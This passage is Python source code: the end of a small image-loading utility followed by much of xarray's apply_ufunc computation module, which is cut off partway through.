out = f"{minutes:02d}:{seconds:02d}"
if hours or days:
out = f"{hours:02d}:{out}"
if days:
out = f"{days}_{out}"
return out
# pylint: disable=no-member
def open_image(path, channels=3, image_size=128):
""" open img with same transforms as ddpm dataset
"""
if isinstance(path, (list, tuple)):
return torch.cat([open_image(p, channels=channels, image_size=image_size)
for p in path])
img = Image.open(path)
if channels == 1:
img = img.convert('L')
else:
img = img.convert('RGB')
transform = transforms.Compose([
transforms.Resize(image_size),
transforms.RandomHorizontalFlip(),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Lambda(lambda t: (t * 2) - 1)
])
return transform(img)[None,...]
|
the-stack_0_1576 | """
Functions for applying functions that act on arrays to xarray's labeled data.
"""
from __future__ import annotations
import functools
import itertools
import operator
import warnings
from collections import Counter
from typing import (
TYPE_CHECKING,
AbstractSet,
Any,
Callable,
Hashable,
Iterable,
Mapping,
Sequence,
overload,
)
import numpy as np
from . import dtypes, duck_array_ops, utils
from .alignment import align, deep_align
from .common import zeros_like
from .duck_array_ops import datetime_to_numeric
from .indexes import Index, filter_indexes_from_coords
from .merge import merge_attrs, merge_coordinates_without_align
from .options import OPTIONS, _get_keep_attrs
from .pycompat import is_duck_dask_array
from .utils import is_dict_like
from .variable import Variable
if TYPE_CHECKING:
from .coordinates import Coordinates
from .dataarray import DataArray
from .dataset import Dataset
from .types import T_Xarray
_NO_FILL_VALUE = utils.ReprObject("<no-fill-value>")
_DEFAULT_NAME = utils.ReprObject("<default-name>")
_JOINS_WITHOUT_FILL_VALUES = frozenset({"inner", "exact"})
def _first_of_type(args, kind):
"""Return either first object of type 'kind' or raise if not found."""
for arg in args:
if isinstance(arg, kind):
return arg
raise ValueError("This should be unreachable.")
def _all_of_type(args, kind):
"""Return all objects of type 'kind'"""
return [arg for arg in args if isinstance(arg, kind)]
class _UFuncSignature:
"""Core dimensions signature for a given function.
Based on the signature provided by generalized ufuncs in NumPy.
Attributes
----------
input_core_dims : tuple[tuple]
Core dimension names on each input variable.
output_core_dims : tuple[tuple]
Core dimension names on each output variable.
"""
__slots__ = (
"input_core_dims",
"output_core_dims",
"_all_input_core_dims",
"_all_output_core_dims",
"_all_core_dims",
)
def __init__(self, input_core_dims, output_core_dims=((),)):
self.input_core_dims = tuple(tuple(a) for a in input_core_dims)
self.output_core_dims = tuple(tuple(a) for a in output_core_dims)
self._all_input_core_dims = None
self._all_output_core_dims = None
self._all_core_dims = None
@property
def all_input_core_dims(self):
if self._all_input_core_dims is None:
self._all_input_core_dims = frozenset(
dim for dims in self.input_core_dims for dim in dims
)
return self._all_input_core_dims
@property
def all_output_core_dims(self):
if self._all_output_core_dims is None:
self._all_output_core_dims = frozenset(
dim for dims in self.output_core_dims for dim in dims
)
return self._all_output_core_dims
@property
def all_core_dims(self):
if self._all_core_dims is None:
self._all_core_dims = self.all_input_core_dims | self.all_output_core_dims
return self._all_core_dims
@property
def dims_map(self):
return {
core_dim: f"dim{n}" for n, core_dim in enumerate(sorted(self.all_core_dims))
}
@property
def num_inputs(self):
return len(self.input_core_dims)
@property
def num_outputs(self):
return len(self.output_core_dims)
def __eq__(self, other):
try:
return (
self.input_core_dims == other.input_core_dims
and self.output_core_dims == other.output_core_dims
)
except AttributeError:
return False
def __ne__(self, other):
return not self == other
def __repr__(self):
return "{}({!r}, {!r})".format(
type(self).__name__,
list(self.input_core_dims),
list(self.output_core_dims),
)
def __str__(self):
lhs = ",".join("({})".format(",".join(dims)) for dims in self.input_core_dims)
rhs = ",".join("({})".format(",".join(dims)) for dims in self.output_core_dims)
return f"{lhs}->{rhs}"
def to_gufunc_string(self, exclude_dims=frozenset()):
"""Create an equivalent signature string for a NumPy gufunc.
Unlike __str__, handles dimensions that don't map to Python
identifiers.
Also creates unique names for input_core_dims contained in exclude_dims.
"""
input_core_dims = [
[self.dims_map[dim] for dim in core_dims]
for core_dims in self.input_core_dims
]
output_core_dims = [
[self.dims_map[dim] for dim in core_dims]
for core_dims in self.output_core_dims
]
# enumerate input_core_dims contained in exclude_dims to make them unique
if exclude_dims:
exclude_dims = [self.dims_map[dim] for dim in exclude_dims]
counter = Counter()
def _enumerate(dim):
if dim in exclude_dims:
n = counter[dim]
counter.update([dim])
dim = f"{dim}_{n}"
return dim
input_core_dims = [
[_enumerate(dim) for dim in arg] for arg in input_core_dims
]
alt_signature = type(self)(input_core_dims, output_core_dims)
return str(alt_signature)
def result_name(objects: list) -> Any:
# use the same naming heuristics as pandas:
# https://github.com/blaze/blaze/issues/458#issuecomment-51936356
names = {getattr(obj, "name", _DEFAULT_NAME) for obj in objects}
names.discard(_DEFAULT_NAME)
if len(names) == 1:
(name,) = names
else:
name = None
return name
def _get_coords_list(args) -> list[Coordinates]:
coords_list = []
for arg in args:
try:
coords = arg.coords
except AttributeError:
pass # skip this argument
else:
coords_list.append(coords)
return coords_list
def build_output_coords_and_indexes(
args: list,
signature: _UFuncSignature,
exclude_dims: AbstractSet = frozenset(),
combine_attrs: str = "override",
) -> tuple[list[dict[Any, Variable]], list[dict[Any, Index]]]:
"""Build output coordinates and indexes for an operation.
Parameters
----------
args : list
List of raw operation arguments. Any valid types for xarray operations
are OK, e.g., scalars, Variable, DataArray, Dataset.
signature : _UfuncSignature
Core dimensions signature for the operation.
exclude_dims : set, optional
Dimensions excluded from the operation. Coordinates along these
dimensions are dropped.
Returns
-------
Dictionaries of Variable and Index objects with merged coordinates.
"""
coords_list = _get_coords_list(args)
if len(coords_list) == 1 and not exclude_dims:
# we can skip the expensive merge
(unpacked_coords,) = coords_list
merged_vars = dict(unpacked_coords.variables)
merged_indexes = dict(unpacked_coords.xindexes)
else:
merged_vars, merged_indexes = merge_coordinates_without_align(
coords_list, exclude_dims=exclude_dims, combine_attrs=combine_attrs
)
output_coords = []
output_indexes = []
for output_dims in signature.output_core_dims:
dropped_dims = signature.all_input_core_dims - set(output_dims)
if dropped_dims:
filtered_coords = {
k: v for k, v in merged_vars.items() if dropped_dims.isdisjoint(v.dims)
}
filtered_indexes = filter_indexes_from_coords(
merged_indexes, set(filtered_coords)
)
else:
filtered_coords = merged_vars
filtered_indexes = merged_indexes
output_coords.append(filtered_coords)
output_indexes.append(filtered_indexes)
return output_coords, output_indexes
def apply_dataarray_vfunc(
func,
*args,
signature,
join="inner",
exclude_dims=frozenset(),
keep_attrs="override",
):
"""Apply a variable level function over DataArray, Variable and/or ndarray
objects.
"""
from .dataarray import DataArray
if len(args) > 1:
args = deep_align(
args, join=join, copy=False, exclude=exclude_dims, raise_on_invalid=False
)
objs = _all_of_type(args, DataArray)
if keep_attrs == "drop":
name = result_name(args)
else:
first_obj = _first_of_type(args, DataArray)
name = first_obj.name
result_coords, result_indexes = build_output_coords_and_indexes(
args, signature, exclude_dims, combine_attrs=keep_attrs
)
data_vars = [getattr(a, "variable", a) for a in args]
result_var = func(*data_vars)
if signature.num_outputs > 1:
out = tuple(
DataArray(
variable, coords=coords, indexes=indexes, name=name, fastpath=True
)
for variable, coords, indexes in zip(
result_var, result_coords, result_indexes
)
)
else:
(coords,) = result_coords
(indexes,) = result_indexes
out = DataArray(
result_var, coords=coords, indexes=indexes, name=name, fastpath=True
)
attrs = merge_attrs([x.attrs for x in objs], combine_attrs=keep_attrs)
if isinstance(out, tuple):
for da in out:
da.attrs = attrs
else:
out.attrs = attrs
return out
def ordered_set_union(all_keys: list[Iterable]) -> Iterable:
return {key: None for keys in all_keys for key in keys}.keys()
def ordered_set_intersection(all_keys: list[Iterable]) -> Iterable:
intersection = set(all_keys[0])
for keys in all_keys[1:]:
intersection.intersection_update(keys)
return [key for key in all_keys[0] if key in intersection]
def assert_and_return_exact_match(all_keys):
first_keys = all_keys[0]
for keys in all_keys[1:]:
if keys != first_keys:
raise ValueError(
"exact match required for all data variable names, "
f"but {keys!r} != {first_keys!r}"
)
return first_keys
_JOINERS: dict[str, Callable] = {
"inner": ordered_set_intersection,
"outer": ordered_set_union,
"left": operator.itemgetter(0),
"right": operator.itemgetter(-1),
"exact": assert_and_return_exact_match,
}
def join_dict_keys(objects: Iterable[Mapping | Any], how: str = "inner") -> Iterable:
joiner = _JOINERS[how]
all_keys = [obj.keys() for obj in objects if hasattr(obj, "keys")]
return joiner(all_keys)
def collect_dict_values(
objects: Iterable[Mapping | Any], keys: Iterable, fill_value: object = None
) -> list[list]:
return [
[obj.get(key, fill_value) if is_dict_like(obj) else obj for obj in objects]
for key in keys
]
def _as_variables_or_variable(arg):
try:
return arg.variables
except AttributeError:
try:
return arg.variable
except AttributeError:
return arg
def _unpack_dict_tuples(
result_vars: Mapping[Any, tuple[Variable, ...]], num_outputs: int
) -> tuple[dict[Hashable, Variable], ...]:
out: tuple[dict[Hashable, Variable], ...] = tuple({} for _ in range(num_outputs))
for name, values in result_vars.items():
for value, results_dict in zip(values, out):
results_dict[name] = value
return out
def apply_dict_of_variables_vfunc(
func, *args, signature, join="inner", fill_value=None
):
"""Apply a variable level function over dicts of DataArray, DataArray,
Variable and ndarray objects.
"""
args = [_as_variables_or_variable(arg) for arg in args]
names = join_dict_keys(args, how=join)
grouped_by_name = collect_dict_values(args, names, fill_value)
result_vars = {}
for name, variable_args in zip(names, grouped_by_name):
result_vars[name] = func(*variable_args)
if signature.num_outputs > 1:
return _unpack_dict_tuples(result_vars, signature.num_outputs)
else:
return result_vars
def _fast_dataset(
variables: dict[Hashable, Variable],
coord_variables: Mapping[Hashable, Variable],
indexes: dict[Hashable, Index],
) -> Dataset:
"""Create a dataset as quickly as possible.
Beware: the `variables` dict is modified INPLACE.
"""
from .dataset import Dataset
variables.update(coord_variables)
coord_names = set(coord_variables)
return Dataset._construct_direct(variables, coord_names, indexes=indexes)
def apply_dataset_vfunc(
func,
*args,
signature,
join="inner",
dataset_join="exact",
fill_value=_NO_FILL_VALUE,
exclude_dims=frozenset(),
keep_attrs="override",
):
"""Apply a variable level function over Dataset, dict of DataArray,
DataArray, Variable and/or ndarray objects.
"""
from .dataset import Dataset
if dataset_join not in _JOINS_WITHOUT_FILL_VALUES and fill_value is _NO_FILL_VALUE:
raise TypeError(
"to apply an operation to datasets with different "
"data variables with apply_ufunc, you must supply the "
"dataset_fill_value argument."
)
objs = _all_of_type(args, Dataset)
if len(args) > 1:
args = deep_align(
args, join=join, copy=False, exclude=exclude_dims, raise_on_invalid=False
)
list_of_coords, list_of_indexes = build_output_coords_and_indexes(
args, signature, exclude_dims, combine_attrs=keep_attrs
)
args = [getattr(arg, "data_vars", arg) for arg in args]
result_vars = apply_dict_of_variables_vfunc(
func, *args, signature=signature, join=dataset_join, fill_value=fill_value
)
if signature.num_outputs > 1:
out = tuple(
_fast_dataset(*args)
for args in zip(result_vars, list_of_coords, list_of_indexes)
)
else:
(coord_vars,) = list_of_coords
(indexes,) = list_of_indexes
out = _fast_dataset(result_vars, coord_vars, indexes=indexes)
attrs = merge_attrs([x.attrs for x in objs], combine_attrs=keep_attrs)
if isinstance(out, tuple):
for ds in out:
ds.attrs = attrs
else:
out.attrs = attrs
return out
def _iter_over_selections(obj, dim, values):
"""Iterate over selections of an xarray object in the provided order."""
from .groupby import _dummy_copy
dummy = None
for value in values:
try:
obj_sel = obj.sel(**{dim: value})
except (KeyError, IndexError):
if dummy is None:
dummy = _dummy_copy(obj)
obj_sel = dummy
yield obj_sel
def apply_groupby_func(func, *args):
"""Apply a dataset or datarray level function over GroupBy, Dataset,
DataArray, Variable and/or ndarray objects.
"""
from .groupby import GroupBy, peek_at
from .variable import Variable
groupbys = [arg for arg in args if isinstance(arg, GroupBy)]
assert groupbys, "must have at least one groupby to iterate over"
first_groupby = groupbys[0]
if any(not first_groupby._group.equals(gb._group) for gb in groupbys[1:]):
raise ValueError(
"apply_ufunc can only perform operations over "
"multiple GroupBy objects at once if they are all "
"grouped the same way"
)
grouped_dim = first_groupby._group.name
unique_values = first_groupby._unique_coord.values
iterators = []
for arg in args:
if isinstance(arg, GroupBy):
iterator = (value for _, value in arg)
elif hasattr(arg, "dims") and grouped_dim in arg.dims:
if isinstance(arg, Variable):
raise ValueError(
"groupby operations cannot be performed with "
"xarray.Variable objects that share a dimension with "
"the grouped dimension"
)
iterator = _iter_over_selections(arg, grouped_dim, unique_values)
else:
iterator = itertools.repeat(arg)
iterators.append(iterator)
applied = (func(*zipped_args) for zipped_args in zip(*iterators))
applied_example, applied = peek_at(applied)
combine = first_groupby._combine
if isinstance(applied_example, tuple):
combined = tuple(combine(output) for output in zip(*applied))
else:
combined = combine(applied)
return combined
def unified_dim_sizes(
variables: Iterable[Variable], exclude_dims: AbstractSet = frozenset()
) -> dict[Hashable, int]:
dim_sizes: dict[Hashable, int] = {}
for var in variables:
if len(set(var.dims)) < len(var.dims):
raise ValueError(
"broadcasting cannot handle duplicate "
f"dimensions on a variable: {list(var.dims)}"
)
for dim, size in zip(var.dims, var.shape):
if dim not in exclude_dims:
if dim not in dim_sizes:
dim_sizes[dim] = size
elif dim_sizes[dim] != size:
raise ValueError(
"operands cannot be broadcast together "
"with mismatched lengths for dimension "
f"{dim}: {dim_sizes[dim]} vs {size}"
)
return dim_sizes
SLICE_NONE = slice(None)
def broadcast_compat_data(
variable: Variable,
broadcast_dims: tuple[Hashable, ...],
core_dims: tuple[Hashable, ...],
) -> Any:
data = variable.data
old_dims = variable.dims
new_dims = broadcast_dims + core_dims
if new_dims == old_dims:
# optimize for the typical case
return data
set_old_dims = set(old_dims)
missing_core_dims = [d for d in core_dims if d not in set_old_dims]
if missing_core_dims:
raise ValueError(
"operand to apply_ufunc has required core dimensions {}, but "
"some of these dimensions are absent on an input variable: {}".format(
list(core_dims), missing_core_dims
)
)
set_new_dims = set(new_dims)
unexpected_dims = [d for d in old_dims if d not in set_new_dims]
if unexpected_dims:
raise ValueError(
"operand to apply_ufunc encountered unexpected "
f"dimensions {unexpected_dims!r} on an input variable: these are core "
"dimensions on other input or output variables"
)
# for consistency with numpy, keep broadcast dimensions to the left
old_broadcast_dims = tuple(d for d in broadcast_dims if d in set_old_dims)
reordered_dims = old_broadcast_dims + core_dims
if reordered_dims != old_dims:
order = tuple(old_dims.index(d) for d in reordered_dims)
data = duck_array_ops.transpose(data, order)
if new_dims != reordered_dims:
key_parts: list[slice | None] = []
for dim in new_dims:
if dim in set_old_dims:
key_parts.append(SLICE_NONE)
elif key_parts:
# no need to insert new axes at the beginning that are already
# handled by broadcasting
key_parts.append(np.newaxis)
data = data[tuple(key_parts)]
return data
def _vectorize(func, signature, output_dtypes, exclude_dims):
if signature.all_core_dims:
func = np.vectorize(
func,
otypes=output_dtypes,
signature=signature.to_gufunc_string(exclude_dims),
)
else:
func = np.vectorize(func, otypes=output_dtypes)
return func
def apply_variable_ufunc(
func,
*args,
signature,
exclude_dims=frozenset(),
dask="forbidden",
output_dtypes=None,
vectorize=False,
keep_attrs="override",
dask_gufunc_kwargs=None,
):
"""Apply a ndarray level function over Variable and/or ndarray objects."""
from .variable import Variable, as_compatible_data
dim_sizes = unified_dim_sizes(
(a for a in args if hasattr(a, "dims")), exclude_dims=exclude_dims
)
broadcast_dims = tuple(
dim for dim in dim_sizes if dim not in signature.all_core_dims
)
output_dims = [broadcast_dims + out for out in signature.output_core_dims]
input_data = [
broadcast_compat_data(arg, broadcast_dims, core_dims)
if isinstance(arg, Variable)
else arg
for arg, core_dims in zip(args, signature.input_core_dims)
]
if any(is_duck_dask_array(array) for array in input_data):
if dask == "forbidden":
raise ValueError(
"apply_ufunc encountered a dask array on an "
"argument, but handling for dask arrays has not "
"been enabled. Either set the ``dask`` argument "
"or load your data into memory first with "
"``.load()`` or ``.compute()``"
)
elif dask == "parallelized":
numpy_func = func
if dask_gufunc_kwargs is None:
dask_gufunc_kwargs = {}
else:
dask_gufunc_kwargs = dask_gufunc_kwargs.copy()
allow_rechunk = dask_gufunc_kwargs.get("allow_rechunk", None)
if allow_rechunk is None:
for n, (data, core_dims) in enumerate(
zip(input_data, signature.input_core_dims)
):
if is_duck_dask_array(data):
# core dimensions cannot span multiple chunks
for axis, dim in enumerate(core_dims, start=-len(core_dims)):
if len(data.chunks[axis]) != 1:
raise ValueError(
f"dimension {dim} on {n}th function argument to "
"apply_ufunc with dask='parallelized' consists of "
"multiple chunks, but is also a core dimension. To "
"fix, either rechunk into a single dask array chunk along "
f"this dimension, i.e., ``.chunk(dict({dim}=-1))``, or "
"pass ``allow_rechunk=True`` in ``dask_gufunc_kwargs`` "
"but beware that this may significantly increase memory usage."
)
dask_gufunc_kwargs["allow_rechunk"] = True
output_sizes = dask_gufunc_kwargs.pop("output_sizes", {})
if output_sizes:
output_sizes_renamed = {}
for key, value in output_sizes.items():
if key not in signature.all_output_core_dims:
raise ValueError(
f"dimension '{key}' in 'output_sizes' must correspond to output_core_dims"
)
output_sizes_renamed[signature.dims_map[key]] = value
dask_gufunc_kwargs["output_sizes"] = output_sizes_renamed
for key in signature.all_output_core_dims:
if key not in signature.all_input_core_dims and key not in output_sizes:
raise ValueError(
f"dimension '{key}' in 'output_core_dims' needs corresponding (dim, size) in 'output_sizes'"
)
def func(*arrays):
import dask.array as da
res = da.apply_gufunc(
numpy_func,
signature.to_gufunc_string(exclude_dims),
*arrays,
vectorize=vectorize,
output_dtypes=output_dtypes,
**dask_gufunc_kwargs,
)
return res
elif dask == "allowed":
pass
else:
raise ValueError(
"unknown setting for dask array handling in "
"apply_ufunc: {}".format(dask)
)
else:
if vectorize:
func = _vectorize(
func, signature, output_dtypes=output_dtypes, exclude_dims=exclude_dims
)
result_data = func(*input_data)
if signature.num_outputs == 1:
result_data = (result_data,)
elif (
not isinstance(result_data, tuple) or len(result_data) != signature.num_outputs
):
raise ValueError(
"applied function does not have the number of "
"outputs specified in the ufunc signature. "
"Result is not a tuple of {} elements: {!r}".format(
signature.num_outputs, result_data
)
)
objs = _all_of_type(args, Variable)
attrs = merge_attrs(
[obj.attrs for obj in objs],
combine_attrs=keep_attrs,
)
output = []
for dims, data in zip(output_dims, result_data):
data = as_compatible_data(data)
if data.ndim != len(dims):
raise ValueError(
"applied function returned data with unexpected "
f"number of dimensions. Received {data.ndim} dimension(s) but "
f"expected {len(dims)} dimensions with names: {dims!r}"
)
var = Variable(dims, data, fastpath=True)
for dim, new_size in var.sizes.items():
if dim in dim_sizes and new_size != dim_sizes[dim]:
raise ValueError(
"size of dimension {!r} on inputs was unexpectedly "
"changed by applied function from {} to {}. Only "
"dimensions specified in ``exclude_dims`` with "
"xarray.apply_ufunc are allowed to change size.".format(
dim, dim_sizes[dim], new_size
)
)
var.attrs = attrs
output.append(var)
if signature.num_outputs == 1:
return output[0]
else:
return tuple(output)
def apply_array_ufunc(func, *args, dask="forbidden"):
"""Apply a ndarray level function over ndarray objects."""
if any(is_duck_dask_array(arg) for arg in args):
if dask == "forbidden":
raise ValueError(
"apply_ufunc encountered a dask array on an "
"argument, but handling for dask arrays has not "
"been enabled. Either set the ``dask`` argument "
"or load your data into memory first with "
"``.load()`` or ``.compute()``"
)
elif dask == "parallelized":
raise ValueError(
"cannot use dask='parallelized' for apply_ufunc "
"unless at least one input is an xarray object"
)
elif dask == "allowed":
pass
else:
raise ValueError(f"unknown setting for dask array handling: {dask}")
return func(*args)
def apply_ufunc(
func: Callable,
*args: Any,
input_core_dims: Sequence[Sequence] = None,
output_core_dims: Sequence[Sequence] | None = ((),),
exclude_dims: AbstractSet = frozenset(),
vectorize: bool = False,
join: str = "exact",
dataset_join: str = "exact",
dataset_fill_value: object = _NO_FILL_VALUE,
keep_attrs: bool | str | None = None,
kwargs: Mapping | None = None,
dask: str = "forbidden",
output_dtypes: Sequence | None = None,
output_sizes: Mapping[Any, int] | None = None,
meta: Any = None,
dask_gufunc_kwargs: dict[str, Any] | None = None,
) -> Any:
"""Apply a vectorized function for unlabeled arrays on xarray objects.
The function will be mapped over the data variable(s) of the input
arguments using xarray's standard rules for labeled computation, including
alignment, broadcasting, looping over GroupBy/Dataset variables, and
merging of coordinates.
Parameters
----------
func : callable
Function to call like ``func(*args, **kwargs)`` on unlabeled arrays
(``.data``) that returns an array or tuple of arrays. If multiple
arguments with non-matching dimensions are supplied, this function is
expected to vectorize (broadcast) over axes of positional arguments in
the style of NumPy universal functions [1]_ (if this is not the case,
set ``vectorize=True``). If this function returns multiple outputs, you
must set ``output_core_dims`` as well.
*args : Dataset, DataArray, DataArrayGroupBy, DatasetGroupBy, Variable, numpy.ndarray, dask.array.Array or scalar
Mix of labeled and/or unlabeled arrays to which to apply the function.
input_core_dims : sequence of sequence, optional
List of the same length as ``args`` giving the list of core dimensions
on each input argument that should not be broadcast. By default, we
assume there are no core dimensions on any input arguments.
For example, ``input_core_dims=[[], ['time']]`` indicates that all
dimensions on the first argument and all dimensions other than 'time'
on the second argument should be broadcast.
Core dimensions are automatically moved to the last axes of input
variables before applying ``func``, which facilitates using NumPy style
generalized ufuncs [2]_.
output_core_dims : list of tuple, optional
List of the same length as the number of output arguments from
``func``, giving the list of core dimensions on each output that were
not broadcast on the inputs. By default, we assume that ``func``
outputs exactly one array, with axes corresponding to each broadcast
dimension.
Core dimensions are assumed to appear as the last dimensions of each
output in the provided order.
exclude_dims : set, optional
Core dimensions on the inputs to exclude from alignment and
broadcasting entirely. Any input coordinates along these dimensions
will be dropped. Each excluded dimension must also appear in
``input_core_dims`` for at least one argument. Only dimensions listed
here are allowed to change size between input and output objects.
vectorize : bool, optional
If True, then assume ``func`` only takes arrays defined over core
dimensions as input and vectorize it automatically with
:py:func:`numpy.vectorize`. This option exists for convenience, but is
almost always slower than supplying a pre-vectorized function.
Using this option requires NumPy version 1.12 or newer.
join : {"outer", "inner", "left", "right", "exact"}, default: "exact"
Method for joining the indexes of the passed objects along each
dimension, and the variables of Dataset objects with mismatched
data variables:
- 'outer': use the union of object indexes
- 'inner': use the intersection of object indexes
- 'left': use indexes from the first object with each dimension
- 'right': use indexes from the last object with each dimension
- 'exact': raise `ValueError` instead of aligning when indexes to be
aligned are not equal
dataset_join : {"outer", "inner", "left", "right", "exact"}, default: "exact"
Method for joining variables of Dataset objects with mismatched
data variables.
- 'outer': take variables from both Dataset objects
- 'inner': take only overlapped variables
- 'left': take only variables from the first object
- 'right': take only variables from the last object
- 'exact': data variables on all Dataset objects must match exactly
dataset_fill_value : optional
Value used in place of missing variables on Dataset inputs when the
datasets do not share the exact same ``data_vars``. Required if
``dataset_join not in {'inner', 'exact'}``, otherwise ignored.
keep_attrs : bool, optional
Whether to copy attributes from the first argument to the output.
kwargs : dict, optional
Optional keyword arguments passed directly on to call ``func``.
dask : {"forbidden", "allowed", "parallelized"}, default: "forbidden"
How to handle applying to objects containing lazy data in the form of
dask arrays:
- 'forbidden' (default): raise an error if a dask array is encountered.
- 'allowed': pass dask arrays directly on to ``func``. Prefer this option if
``func`` natively supports dask arrays.
- 'parallelized': automatically parallelize ``func`` if any of the
inputs are a dask array by using :py:func:`dask.array.apply_gufunc`. Multiple output
arguments are supported. Only use this option if ``func`` does not natively
support dask arrays (e.g. converts them to numpy arrays).
dask_gufunc_kwargs : dict, optional
Optional keyword arguments passed to :py:func:`dask.array.apply_gufunc` if
dask='parallelized'. Possible keywords are ``output_sizes``, ``allow_rechunk``
and ``meta``.
output_dtypes : list of dtype, optional
Optional list of output dtypes. Only used if ``dask='parallelized'`` or
``vectorize=True``.
output_sizes : dict, optional
Optional mapping from dimension names to sizes for outputs. Only used
if dask='parallelized' and new dimensions (not found on inputs) appear
on outputs. ``output_sizes`` should be given in the ``dask_gufunc_kwargs``
parameter. It will be removed as direct parameter in a future version.
meta : optional
Size-0 object representing the type of array wrapped by dask array. Passed on to
:py:func:`dask.array.apply_gufunc`. ``meta`` should be given in the
``dask_gufunc_kwargs`` parameter . It will be removed as direct parameter
a future version.
Returns
-------
Single value or tuple of Dataset, DataArray, Variable, dask.array.Array or
numpy.ndarray, the first type on that list to appear on an input.
Notes
-----
This function is designed for the more common case where ``func`` can work on numpy
arrays. If ``func`` needs to manipulate a whole xarray object subset to each block
it is possible to use :py:func:`xarray.map_blocks`.
Note that due to the overhead :py:func:`xarray.map_blocks` is considerably slower than ``apply_ufunc``.
Examples
--------
Calculate the vector magnitude of two arguments:
>>> def magnitude(a, b):
... func = lambda x, y: np.sqrt(x**2 + y**2)
... return xr.apply_ufunc(func, a, b)
...
You can now apply ``magnitude()`` to :py:class:`DataArray` and :py:class:`Dataset`
objects, with automatically preserved dimensions and coordinates, e.g.,
>>> array = xr.DataArray([1, 2, 3], coords=[("x", [0.1, 0.2, 0.3])])
>>> magnitude(array, -array)
<xarray.DataArray (x: 3)>
array([1.41421356, 2.82842712, 4.24264069])
Coordinates:
* x (x) float64 0.1 0.2 0.3
Plain scalars, numpy arrays and a mix of these with xarray objects is also
supported:
>>> magnitude(3, 4)
5.0
>>> magnitude(3, np.array([0, 4]))
array([3., 5.])
>>> magnitude(array, 0)
<xarray.DataArray (x: 3)>
array([1., 2., 3.])
Coordinates:
* x (x) float64 0.1 0.2 0.3
Other examples of how you could use ``apply_ufunc`` to write functions to
(very nearly) replicate existing xarray functionality:
Compute the mean (``.mean``) over one dimension:
>>> def mean(obj, dim):
... # note: apply always moves core dimensions to the end
... return apply_ufunc(
... np.mean, obj, input_core_dims=[[dim]], kwargs={"axis": -1}
... )
...
Inner product over a specific dimension (like :py:func:`dot`):
>>> def _inner(x, y):
... result = np.matmul(x[..., np.newaxis, :], y[..., :, np.newaxis])
... return result[..., 0, 0]
...
>>> def inner_product(a, b, dim):
... return apply_ufunc(_inner, a, b, input_core_dims=[[dim], [dim]])
...
Stack objects along a new dimension (like :py:func:`concat`):
>>> def stack(objects, dim, new_coord):
... # note: this version does not stack coordinates
... func = lambda *x: np.stack(x, axis=-1)
... result = apply_ufunc(
... func,
... *objects,
... output_core_dims=[[dim]],
... join="outer",
... dataset_fill_value=np.nan
... )
... result[dim] = new_coord
... return result
...
If your function is not vectorized but can be applied only to core
dimensions, you can use ``vectorize=True`` to turn into a vectorized
function. This wraps :py:func:`numpy.vectorize`, so the operation isn't
terribly fast. Here we'll use it to calculate the distance between
empirical samples from two probability distributions, using a scipy
function that needs to be applied to vectors:
>>> import scipy.stats
>>> def earth_mover_distance(first_samples, second_samples, dim="ensemble"):
... return apply_ufunc(
... scipy.stats.wasserstein_distance,
... first_samples,
... second_samples,
... input_core_dims=[[dim], [dim]],
... vectorize=True,
... )
...
Most of NumPy's builtin functions already broadcast their inputs
appropriately for use in ``apply_ufunc``. You may find helper functions such as
:py:func:`numpy.broadcast_arrays` helpful in writing your function. ``apply_ufunc`` also
works well with :py:func:`numba.vectorize` and :py:func:`numba.guvectorize`.
See Also
--------
numpy.broadcast_arrays
numba.vectorize
numba.guvectorize
dask.array.apply_gufunc
xarray.map_blocks
:ref:`dask.automatic-parallelization`
User guide describing :py:func:`apply_ufunc` and :py:func:`map_blocks`.
References
----------
.. [1] https://numpy.org/doc/stable/reference/ufuncs.html
.. [2] https://numpy.org/doc/stable/reference/c-api/generalized-ufuncs.html
"""
from .dataarray import DataArray
from .groupby import GroupBy
from .variable import Variable
if input_core_dims is None:
input_core_dims = ((),) * (len(args))
elif len(input_core_dims) != len(args):
raise ValueError(
f"input_core_dims must be None or a tuple with the length same to "
f"the number of arguments. "
f"Given {len(input_core_dims)} input_core_dims: {input_core_dims}, "
f" but number of args is {len(args)}."
)
if kwargs is None:
kwargs = {}
signature = _UFuncSignature(input_core_dims, output_core_dims)
if exclude_dims:
if not isinstance(exclude_dims, set):
raise TypeError(
f"Expected exclude_dims to be a 'set'. Received '{type(exclude_dims).__name__}' instead."
)
if not exclude_dims <= signature.all_core_dims:
raise ValueError(
f"each dimension in `exclude_dims` must also be a "
f"core dimension in the function signature. "
f"Please make {(exclude_dims - signature.all_core_dims)} a core dimension"
)
# handle dask_gufunc_kwargs
if dask == "parallelized":
if dask_gufunc_kwargs is None:
dask_gufunc_kwargs = {}
else:
dask_gufunc_kwargs = dask_gufunc_kwargs.copy()
# todo: remove warnings after deprecation cycle
if meta is not None:
warnings.warn(
"``meta`` should be given in the ``dask_gufunc_kwargs`` parameter."
" It will be removed as direct parameter in a future version.",
FutureWarning,
stacklevel=2,
)
dask_gufunc_kwargs.setdefault("meta", meta)
if output_sizes is not None:
warnings.warn(
"``output_sizes`` should be given in the ``dask_gufunc_kwargs`` "
"parameter. It will be removed as direct parameter in a future "
"version.",
FutureWarning,
stacklevel=2,
)
dask_gufunc_kwargs.setdefault("output_sizes", output_sizes)
if kwargs:
func = functools.partial(func, **kwargs)
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
if isinstance(keep_attrs, bool):
keep_attrs = "override" if keep_attrs else "drop"
variables_vfunc = functools.partial(
apply_variable_ufunc,
func,
signature=signature,
exclude_dims=exclude_dims,
keep_attrs=keep_attrs,
dask=dask,
vectorize=vectorize,
output_dtypes=output_dtypes,
dask_gufunc_kwargs=dask_gufunc_kwargs,
)
# feed groupby-apply_ufunc through apply_groupby_func
if any(isinstance(a, GroupBy) for a in args):
this_apply = functools.partial(
apply_ufunc,
func,
input_core_dims=input_core_dims,
output_core_dims=output_core_dims,
exclude_dims=exclude_dims,
join=join,
dataset_join=dataset_join,
dataset_fill_value=dataset_fill_value,
keep_attrs=keep_attrs,
dask=dask,
vectorize=vectorize,
output_dtypes=output_dtypes,
dask_gufunc_kwargs=dask_gufunc_kwargs,
)
return apply_groupby_func(this_apply, *args)
# feed datasets apply_variable_ufunc through apply_dataset_vfunc
elif any(is_dict_like(a) for a in args):
return apply_dataset_vfunc(
variables_vfunc,
*args,
signature=signature,
join=join,
exclude_dims=exclude_dims,
dataset_join=dataset_join,
fill_value=dataset_fill_value,
keep_attrs=keep_attrs,
)
# feed DataArray apply_variable_ufunc through apply_dataarray_vfunc
